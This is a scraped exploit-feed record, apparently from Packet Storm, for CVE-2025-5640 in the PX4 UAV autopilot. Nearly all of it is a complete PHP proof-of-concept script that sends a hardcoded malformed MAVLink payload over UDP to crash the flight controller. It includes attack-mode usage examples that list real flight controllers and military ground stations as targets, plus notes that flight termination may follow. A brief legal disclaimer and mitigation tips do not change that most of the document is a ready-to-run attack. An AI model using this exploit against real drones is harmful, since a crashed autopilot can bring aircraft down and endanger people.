{“lastseen”:”2025-12-02T19:40:08″,”description”:”This proof of concept exploits a stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3, allowing an attacker to send a poorly formatted MAVLink message that causes a denial of service condition…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PX4 Military UAV Autopilot 1.12.3 Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:212326″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-5640″],”sourceData”:”=============================================================================================================================================\\n | # Title : PX4 Military UAV Autopilot 1.12.3 Remote DoS Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/docs.px4.io\/v1.12\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/202894\/ \\u0026 \\tCVE-2025-5640\\n \\n [+] Summary : This PoC exploits a Stack-Based Buffer Overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3, \\n allowing an attacker to send a poorly formatted MAVLink message of type:\\n TRAJECTORY_REPRESENTATION_WAYPOINTS to cause a complete failure (Denial of Service) of the UAV’s autopilot.\\n The PoC works by sending a malicious MAVLink payload via UDP to the common control port (14540\u201314550). \\n \\t\\t\\t Receiving data exceeding the expected size overwrites the stack memory, causing the autopilot to malfunction \\n \\t\\t\\t and the aircraft to enter Failsafe mode or lose connectivity entirely.\\n \\n \\t\\t\\t\\n [+] POC : php poc.php\\n \\n \\u003c?php\\n \/**\\n * Author: indoushka\\n * Description:\\n * Stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot \\u003c=1.12.3\\n * triggered via malformed MAVLink TRAJECTORY_REPRESENTATION_WAYPOINTS message.\\n *\/\\n \\n class PX4UAVExploit {\\n private $targetIp;\\n private $targetPort;\\n private $timeout;\\n private $verbose;\\n \\n \/\/ Malformed MAVLink hex payload\\n private $hexPayload = \\”fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6\\”;\\n \\n public function __construct($ip = \\”127.0.0.1\\”, $port = 14540, $timeout = 5, $verbose = false) {\\n $this-\\u003etargetIp = $ip;\\n $this-\\u003etargetPort = $port;\\n $this-\\u003etimeout = $timeout;\\n $this-\\u003everbose = $verbose;\\n }\\n \\n public function run($mode = \\”dos\\”) {\\n $this-\\u003eshowBanner();\\n \\n try {\\n switch ($mode) {\\n case \\”check\\”:\\n $this-\\u003echeckConnection();\\n break;\\n case \\”dos\\”:\\n $this-\\u003eexecuteDos();\\n break;\\n default:\\n $this-\\u003eerror(\\”Unknown mode: $mode\\”);\\n return;\\n }\\n } catch (Exception $e) {\\n $this-\\u003eerror(\\”Execution failed: \\” . $e-\\u003egetMessage());\\n }\\n }\\n \\n private function checkConnection() {\\n $this-\\u003einfo(\\”Testing connection to PX4 autopilot…\\”);\\n $this-\\u003einfo(\\”Target: {$this-\\u003etargetIp}:{$this-\\u003etargetPort}\\”);\\n \\n \/\/ Create UDP socket\\n $socket = $this-\\u003ecreateUdpSocket();\\n if (!$socket) {\\n $this-\\u003eerror(\\”Failed to create UDP socket\\”);\\n return;\\n }\\n \\n \/\/ Send heartbeat check\\n $heartbeat = $this-\\u003ecreateMavlinkHeartbeat();\\n $result = socket_sendto($socket, $heartbeat, strlen($heartbeat), 0, $this-\\u003etargetIp, $this-\\u003etargetPort);\\n \\n if ($result === false) {\\n $this-\\u003eerror(\\”Failed to send heartbeat\\”);\\n } else {\\n $this-\\u003einfo(\\”Heartbeat sent successfully\\”);\\n \\n \/\/ Wait for response\\n socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array(‘sec’ =\\u003e $this-\\u003etimeout, ‘usec’ =\\u003e 0));\\n \\n $response = ”;\\n $from = ”;\\n $port = 0;\\n $bytes = socket_recvfrom($socket, $response, 1024, 0, $from, $port);\\n \\n if ($bytes \\u003e 0) {\\n $this-\\u003esuccess(\\”PX4 autopilot is responsive! Received $bytes bytes from $from:$port\\”);\\n $this-\\u003einfo(\\”Connection test PASSED\\”);\\n } else {\\n $this-\\u003ewarning(\\”No response received – PX4 may be offline or not listening\\”);\\n }\\n }\\n \\n socket_close($socket);\\n }\\n \\n private function executeDos() {\\n $this-\\u003ewarning(\\”\ud83d\udea8 LAUNCHING DENIAL OF SERVICE ATTACK \ud83d\udea8\\”);\\n $this-\\u003einfo(\\”Target: {$this-\\u003etargetIp}:{$this-\\u003etargetPort}\\”);\\n $this-\\u003einfo(\\”This will crash the PX4 autopilot if vulnerable\\”);\\n \\n \/\/ Countdown\\n for ($i = 5; $i \\u003e 0; $i–) {\\n $this-\\u003einfo(\\”Sending exploit in $i seconds… (Ctrl+C to abort)\\”);\\n sleep(1);\\n }\\n \\n $socket = $this-\\u003ecreateUdpSocket();\\n if (!$socket) {\\n $this-\\u003eerror(\\”Failed to create UDP socket for attack\\”);\\n return;\\n }\\n \\n \/\/ Convert hex payload to binary\\n $payload = hex2bin($this-\\u003ehexPayload);\\n if (!$payload) {\\n $this-\\u003eerror(\\”Failed to decode hex payload\\”);\\n socket_close($socket);\\n return;\\n }\\n \\n $this-\\u003einfo(\\”Sending malformed MAVLink packet…\\”);\\n \\n \/\/ Send multiple packets for reliability\\n $packetsSent = 0;\\n for ($i = 0; $i \\u003c 3; $i++) {\\n $result = socket_sendto($socket, $payload, strlen($payload), 0, $this-\\u003etargetIp, $this-\\u003etargetPort);\\n \\n if ($result === false) {\\n $this-\\u003eerror(\\”Failed to send packet #\\” . ($i + 1));\\n } else {\\n $this-\\u003einfo(\\”Packet #\\” . ($i + 1) . \\” sent successfully ($result bytes)\\”);\\n $packetsSent++;\\n }\\n \\n usleep(100000); \/\/ 100ms delay between packets\\n }\\n \\n socket_close($socket);\\n \\n if ($packetsSent \\u003e 0) {\\n $this-\\u003esuccess(\\”Exploit packets delivered successfully\\”);\\n $this-\\u003ewarning(\\”PX4 autopilot should crash if vulnerable to CVE-2025-5640\\”);\\n $this-\\u003eshowPostExploitationInfo();\\n } else {\\n $this-\\u003eerror(\\”No packets were sent successfully\\”);\\n }\\n }\\n \\n private function createUdpSocket() {\\n $socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);\\n if ($socket === false) {\\n return false;\\n }\\n \\n \/\/ Set socket options\\n socket_set_option($socket, SOL_SOCKET, SO_REUSEADDR, 1);\\n socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array(‘sec’ =\\u003e $this-\\u003etimeout, ‘usec’ =\\u003e 0));\\n \\n return $socket;\\n }\\n \\n private function createMavlinkHeartbeat() {\\n \/\/ Simple MAVLink heartbeat message (system ID 255, component ID 0)\\n $heartbeat = hex2bin(\\”fe09000000ff0000000000000000000000000203d403\\”);\\n return $heartbeat ?: ”;\\n }\\n \\n private function showPostExploitationInfo() {\\n $this-\\u003einfo(\\”\\n \ud83d\udcca POST-EXPLOITATION ACTIONS:\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 1. Monitor UAV Status:\\n \u2022 Check if autopilot stopped responding\\n \u2022 Verify telemetry data interruption\\n \u2022 Observe flight controller behavior\\n \\n 2. Impact Assessment:\\n \u2022 Autopilot crash = UAV may enter failsafe mode\\n \u2022 Possible flight termination in worst case\\n \u2022 Ground station connection loss\\n \\n 3. Recovery Actions:\\n \u2022 Restart PX4 software\\n \u2022 Reboot flight controller\\n \u2022 Re-establish MAVLink connections\\n \\n \ud83d\udee1\ufe0f MITIGATION RECOMMENDATIONS:\\n \u2022 Update PX4 to version \\u003e 1.12.3\\n \u2022 Implement MAVLink message validation\\n \u2022 Use message authentication\\n \u2022 Network segmentation for UAV communications\\n \\”);\\n }\\n \\n private function showBanner() {\\n echo \\”\\n \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n \u2502 PX4 UAV AUTOPILOT EXPLOIT \u2502\\n \u2502 CVE-2025-5640 – Remote DoS Exploit \u2502\\n \u2502 \u2502\\n \u2502 Target: PX4 Military UAV Autopilot \\u003c= 1.12.3 \u2502\\n \u2502 Vulnerability: Stack-based Buffer Overflow \u2502\\n \u2502 Impact: Denial of Service (Autopilot Crash) \u2502\\n \u2502 Author: indoushka \u2502\\n \u2502 PHP Implementation \u2502\\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\\\n\\\\n\\”;\\n }\\n \\n private function info($message) {\\n echo \\”\u2139\ufe0f [INFO] \\” . $message . \\”\\\\n\\”;\\n }\\n \\n private function success($message) {\\n echo \\”\u2705 [SUCCESS] \\” . $message . \\”\\\\n\\”;\\n }\\n \\n private function warning($message) {\\n echo \\”\u26a0\ufe0f [WARNING] \\” . $message . \\”\\\\n\\”;\\n }\\n \\n private function error($message) {\\n echo \\”\u274c [ERROR] \\” . $message . \\”\\\\n\\”;\\n }\\n }\\n \\n function showHelp() {\\n echo \\”\\n \ud83d\udcd6 PX4 UAV Autopilot DoS Exploit (CVE-2025-5640)\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n \ud83d\udee0\ufe0f Usage:\\n php px4_exploit.php [OPTIONS]\\n \\n \ud83d\udccb Options:\\n –ip Target IP address (default: 127.0.0.1)\\n –port Target UDP port (default: 14540)\\n –mode Operation mode: dos, check (default: dos)\\n –timeout Timeout in seconds (default: 5)\\n –help Show this help information\\n \\n \ud83c\udfaf Examples:\\n # Check connection to PX4\\n php px4_exploit.php –mode check –ip 192.168.1.100 –port 14550\\n \\n # Launch DoS attack\\n php px4_exploit.php –mode dos –ip 192.168.1.100 –port 14550\\n \\n # Attack local SITL instance\\n php px4_exploit.php –mode dos\\n \\n \u26a0\ufe0f LEGAL DISCLAIMER:\\n This tool is for authorized security testing only.\\n Do not use against systems you don’t own or have permission to test.\\n \\n Military UAV systems are critical infrastructure.\\n Unauthorized access may violate national and international laws.\\n \\n \ud83d\udd27 Technical Details:\\n \u2022 Vulnerability: Buffer overflow in MAVLink message handling\\n \u2022 Affected: PX4 Autopilot \\u003c= 1.12.3\\n \u2022 Protocol: MAVLink over UDP\\n \u2022 Port: Typically 14540-14550\\n \u2022 Impact: Autopilot crash \u2192 UAV failsafe\/termination\\n \\n \ud83c\udfaf Target Environments:\\n \u2022 PX4 SITL (Software In The Loop)\\n \u2022 Real PX4 flight controllers\\n \u2022 Military UAV ground control stations\\n \u2022 Drone testing laboratories\\n \\\\n\\”;\\n }\\n \\n function parseArguments($argv) {\\n $options = [\\n ‘ip’ =\\u003e ‘127.0.0.1’,\\n ‘port’ =\\u003e 14540,\\n ‘mode’ =\\u003e ‘dos’,\\n ‘timeout’ =\\u003e 5,\\n ‘help’ =\\u003e false\\n ];\\n \\n for ($i = 1; $i \\u003c count($argv); $i++) {\\n switch ($argv[$i]) {\\n case ‘–ip’:\\n $options[‘ip’] = $argv[++$i] ?? ‘127.0.0.1’;\\n break;\\n case ‘–port’:\\n $options[‘port’] = intval($argv[++$i] ?? 14540);\\n break;\\n case ‘–mode’:\\n $options[‘mode’] = $argv[++$i] ?? ‘dos’;\\n break;\\n case ‘–timeout’:\\n $options[‘timeout’] = intval($argv[++$i] ?? 5);\\n break;\\n case ‘–help’:\\n $options[‘help’] = true;\\n break;\\n }\\n }\\n \\n return $options;\\n }\\n \\n \/\/ Main execution\\n if (php_sapi_name() !== ‘cli’) {\\n die(\\”\u274c This script must be run from command line\\\\n\\”);\\n }\\n \\n $options = parseArguments($argv);\\n \\n if ($options[‘help’]) {\\n showHelp();\\n exit(0);\\n }\\n \\n \/\/ Validate mode\\n if (!in_array($options[‘mode’], [‘dos’, ‘check’])) {\\n echo \\”\u274c Invalid mode. Use ‘dos’ or ‘check’\\\\n\\”;\\n showHelp();\\n exit(1);\\n }\\n \\n \/\/ Validate IP address\\n if (!filter_var($options[‘ip’], FILTER_VALIDATE_IP)) {\\n echo \\”\u274c Invalid IP address: {$options[‘ip’]}\\\\n\\”;\\n exit(1);\\n }\\n \\n \/\/ Validate port\\n if ($options[‘port’] \\u003c 1 || $options[‘port’] \\u003e 65535) {\\n echo \\”\u274c Invalid port number: {$options[‘port’]}\\\\n\\”;\\n exit(1);\\n }\\n \\n try {\\n $exploit = new PX4UAVExploit(\\n $options[‘ip’],\\n $options[‘port’], \\n $options[‘timeout’],\\n true\\n );\\n \\n $exploit-\\u003erun($options[‘mode’]);\\n \\n } catch (Exception $e) {\\n echo \\”\u274c Fatal error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n ?\\u003e\\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212326″,”cvss”:{“score”:4.8,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:L\/AC:L\/AT:N\/PR:L\/UI:N\/VC:N\/SC:N\/VI:N\/SI:N\/VA:L\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:N\/A:L”,”baseScore”:3.3,”baseSeverity”:”LOW”,”attackVector”:”LOCAL”,”attackComplexity”:”LOW”,”privilegesRequired”:”LOW”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”NONE”,”integrityImpact”:”NONE”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/212326\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-02T19:40:08″,”description”:”This proof of concept exploits a stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3, allowing an attacker to send a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,75,12,21,13,53,7,11,5],"class_list":["post-28310","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-48","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n